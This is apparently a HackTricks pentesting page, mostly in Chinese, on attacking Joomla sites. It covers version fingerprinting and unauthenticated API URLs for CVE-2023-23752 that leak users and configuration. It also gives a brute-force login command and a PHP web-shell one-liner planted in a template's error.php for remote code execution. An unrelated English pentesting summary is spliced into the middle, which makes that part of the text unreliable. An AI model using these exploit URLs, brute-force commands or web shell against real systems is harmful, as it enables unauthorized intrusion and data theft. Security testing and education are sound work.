6 KiB
Joomla
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
- 您在网络安全公司工作吗? 想要看到您的公司在HackTricks中做广告吗? 或者您想要访问PEASS的最新版本或下载PDF格式的HackTricks吗? 请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入 💬 Discord群组 或 电报群组 或 关注我的 Twitter 🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。
Joomla统计信息
Joomla收集一些匿名的使用统计信息,例如Joomla、PHP和数据库版本的分布以及Joomla安装中使用的服务器操作系统。 可以通过他们的公共API查询这些数据。
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
枚举
发现/足迹
- 检查 meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
-
robots.txt
-
robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
Joomla
Introduction
Joomla is a popular Content Management System (CMS) that is used to build websites and online applications. It is important to pentest Joomla websites to identify and fix security vulnerabilities.
Pentesting Joomla
When pentesting Joomla websites, some common vulnerabilities to look for include:
- Outdated Joomla versions: Check if the Joomla version is outdated and vulnerable to known exploits.
- Insecure Joomla extensions: Vulnerabilities in third-party extensions can be exploited to compromise the website.
- Weak administrator passwords: Brute forcing or guessing weak passwords can give unauthorized access to the Joomla admin panel.
- SQL injection: Joomla websites can be vulnerable to SQL injection attacks if input validation is not properly implemented.
- File inclusion vulnerabilities: Check for file inclusion vulnerabilities that can be exploited to execute malicious code on the server.
Tools for Pentesting Joomla
Some tools that can be used for pentesting Joomla websites include:
- JoomScan: A tool specifically designed for Joomla pentesting, it can scan Joomla installations for security vulnerabilities.
- OWASP ZAP: An intercepting proxy tool that can be used to find security vulnerabilities in Joomla websites.
- SQLMap: A popular tool for detecting and exploiting SQL injection vulnerabilities in Joomla and other web applications.
Conclusion
Pentesting Joomla websites is crucial to ensure the security of the website and protect against potential cyber attacks. By identifying and fixing vulnerabilities, website owners can prevent unauthorized access and data breaches.
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
版本
- 在 /administrator/manifests/files/joomla.xml 中可以看到版本。
- 在 /language/en-GB/en-GB.xml 中可以获取 Joomla 的版本。
- 在 plugins/system/cache/cache.xml 中可以看到一个大致的版本。
droopescan scan joomla --url http://joomla-site.local/
API未经身份验证的信息泄露:
版本从4.0.0到4.2.7存在未经身份验证的信息泄露漏洞(CVE-2023-23752),将导致凭据和其他信息泄露。
-
用户:
http://<host>/api/v1/users?public=true
-
配置文件:
http://<host>/api/index.php/v1/config/application?public=true
MSF模块:scanner/http/joomla_api_improper_access_checks
或ruby脚本:51334
暴力破解
您可以使用此脚本尝试对登录进行暴力破解。
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
如果您成功获取了管理员凭据,您可以通过添加一小段PHP代码来在其中获得RCE。我们可以通过自定义一个模板来实现这一点。
- 在
Configuration
下方点击**Templates
**以打开模板菜单。 - 点击一个模板名称。让我们选择
Template
列标题下的**protostar
。这将带我们到Templates: Customise
**页面。 - 最后,您可以点击一个页面以查看页面源代码。让我们选择**
error.php
页面。我们将添加一个PHP一行代码以获得代码执行**,如下所示:system($_GET['cmd']);
- 保存并关闭
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id